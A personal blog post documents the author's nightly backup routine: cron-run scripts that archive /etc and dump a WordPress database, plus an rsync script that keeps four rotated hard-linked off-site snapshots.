For my first post I’m going to document the backup solution I use on my web server.
The backups happen in two parts:
Step 1 – Make Dumps of Important Data
First, I create backup files of important non-file data on my webserver in a specific place. In my case those files are:

- A tarball of the `/etc/` directory, with essentially ALL of the configuration data for my system.
- Dumps of any databases that I have on the system.
These files are generated by two scripts which are run every night by `cron`.
The `mytar` Script

```bash
#!/bin/bash
DATE=`date +%Y%m%d`
DEST="/home/oneill/backup/local"
dir=`basename $1`
tar -jcf $DEST/$dir.$DATE.tar.bz2 $1
chown oneill:oneill $DEST/$dir.$DATE.tar.bz2
```
Pretty simple. I call it in the cron job using the following command:

```
47 0 * * * sudo /home/oneill/local/bin/mytar /etc > /dev/null
```
That means: at 00:47 every day, run this job. I ignore standard output, but any errors (output to stderr) will be caught by cron and emailed to me. I choose the minute for my cron jobs somewhat at random: since I use a VPS shared with other users, picking a random time makes it less likely that my jobs run at the same moment as theirs.
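Getting those error emails relies on cron knowing where to send mail. A minimal sketch of the relevant crontab lines, with a placeholder address (the real one isn't shown here):

```
MAILTO=oneill@example.com
# stdout is thrown away; anything written to stderr gets mailed to MAILTO
47 0 * * * sudo /home/oneill/local/bin/mytar /etc > /dev/null
```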
The `backup_wordpress` Script

```bash
#!/bin/sh
DBNAME="alexrichards"
DBUSER="*****"
DBPASS="*****"
DEST="$HOME/backup/local/$DBNAME.dump.sql"
CMD="mysqldump -e --create-options -u $DBUSER --password=$DBPASS $DBNAME"
$CMD > $DEST
```
Both these files are placed in `~/backup/local/`, which is then backed up to a completely different computer.
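A backup is only useful if it can be restored, so it's worth a quick sanity check now and again. A rough sketch of how I'd pull things back out of these files; the date, the config file picked out, and the MySQL account are placeholders, not part of the scripts above:

```bash
# Pull a single configuration file back out of the /etc tarball
# (the date in the filename is whatever day that backup ran)
tar -jxf ~/backup/local/etc.20120101.tar.bz2 etc/nginx/nginx.conf

# Recreate the WordPress database from the dump
# (assumes the database itself already exists; "root" is just a placeholder account)
mysql -u root -p alexrichards < ~/backup/local/alexrichards.dump.sql
```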
Step 2 – Off-site Backup
I use `rsync` to make incremental off-site backups onto a computer located under my desk at work.
The backups are rotated, with 4 older copies being kept. This helps me not to panic if, for example, I delete a critical file but don’t notice until AFTER the backup has happened (and the critical file is therefore not present in the most recent backup).
To do this rotation, I use a hard-link method in order to save time and disk space.
Here’s the script I use: `mybackup`

```bash
#!/bin/bash
# usage: mybackup
# config file: ~/.mybackup
# format: One directory per line, with
#         optional rsync destination after

DIRFILE=$HOME/.mybackup
DEFAULT_DEST="/data/backup"
RSYNC_CMD="rsync -a --rsh=ssh --delete --progress"
NUM_SNAPSHOTS=4

if ! [ -f $DIRFILE ]; then
    echo "Backup config file $DIRFILE not found"
    exit -1
fi

cat $DIRFILE | while read line; do
    # skip blank lines
    if [ "$line" == "" ]; then
        continue
    fi

    # skip commented lines ('#')
    if [ `expr match "$line" '#'` -gt 0 ]; then
        continue
    fi

    src=`echo $line | awk '{print $1}'`
    dir=`basename $src | awk -F ':' '{print $(NF)}' | awk -F '/' '{print $NF}'`
    dest=`echo $line | awk '{print $2}'`
    if [ "$dest" == "" ]; then
        dest=$DEFAULT_DEST
    fi
    host=`echo $src | awk -F ':' '{print $1}'`
    host=`echo $host | awk -F '@' '{print $NF}'`
    dest="$dest/$host"
    mkdir -p "$dest"

    # shuffle the existing backups
    if [ -e $dest/$dir.$NUM_SNAPSHOTS ]; then
        echo "deleting oldest backup $dir.$NUM_SNAPSHOTS"
        rm -rf $dest/$dir.$NUM_SNAPSHOTS
    fi
    for j in `seq $NUM_SNAPSHOTS -1 1`; do
        i=`echo $j - 1 | bc`
        if [ -e "$dest/$dir.$i" ]; then
            echo "Found old backup $dir.$i, moving to $dir.$j"
            mv "$dest/$dir.$i" "$dest/$dir.$j"
        fi
    done

    echo "Backing up dir: $src to $dest/$dir.0"
    CMD="$RSYNC_CMD --link-dest=../$dir.1 $src $dest/$dir.0/"
    echo $CMD
    $CMD
done
```
`mybackup` reads the file `~/.mybackup` to get a list of locations to back up. In my case, this file looks like this:
```
potatoriot.com:mail/         /home/oneill/backup/
potatoriot.com:html/         /home/oneill/backup/
potatoriot.com:backup/local/ /home/oneill/backup/
```
This creates directories like `~/backup/potatoriot.com/html.0` through `~/backup/potatoriot.com/html.4`.
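Since the destination column is optional and the script strips any leading user@ from the source when building the per-host directory, a hypothetical extra line like the one below (not part of my real config) would end up under the default destination instead, i.e. in /data/backup/potatoriot.com/etc.0 and so on:

```
oneill@potatoriot.com:etc/
```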
Explanation
First, for each directory to be backed up, the oldest backup is deleted, and the others are shuffled along in the backup order (`html.3` becomes `html.4`).
Next, a fresh snapshot (`html.0`) is produced using `rsync` with the `--link-dest` argument, which creates hard links to the files in `html.1` where possible:

```bash
CMD="$RSYNC_CMD --link-dest=../$dir.1 $src $dest/$dir.0/"
```
This hard-link strategy means that any file that already exists, unchanged, in `html.1` is not copied into the new directory; it is simply hard-linked, which saves space. Nor is it copied over the network, thanks to the magic of rsync. And if a file has changed, rsync starts from the local copy in the previous backup and transfers only the changes over the network.
This strategy makes backing up extremely efficient. The backup uses approximately the same amount of space as the original files do, even though I have 4 older revisions available should anything have changed.
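It's easy to check that the hard-linking is actually happening. A quick sketch using my snapshot layout from above (the file name is just an illustrative example): unchanged files share an inode across snapshots, and du counts each hard-linked file only once within a single invocation.

```bash
# Identical files in adjacent snapshots should report the same inode number
ls -li ~/backup/potatoriot.com/html.0/index.php \
       ~/backup/potatoriot.com/html.1/index.php

# Per-snapshot sizes plus a grand total; the total stays close to the size
# of a single copy because hard-linked files are only counted once
du -csh ~/backup/potatoriot.com/html.[0-4]
```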
I run `mybackup` every night via a cron job. I chose the time to be at least an hour after the cron job on the webserver, so that the latest database dumps make it into the backup.
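For reference, the crontab entry on the work machine looks something like this; the exact minute and the install path of `mybackup` are placeholders, the only real constraint being that it runs comfortably after the 00:47 dump jobs on the server:

```
# run the off-site backup well after the server-side dump jobs have finished
17 2 * * * /home/oneill/local/bin/mybackup > /dev/null
```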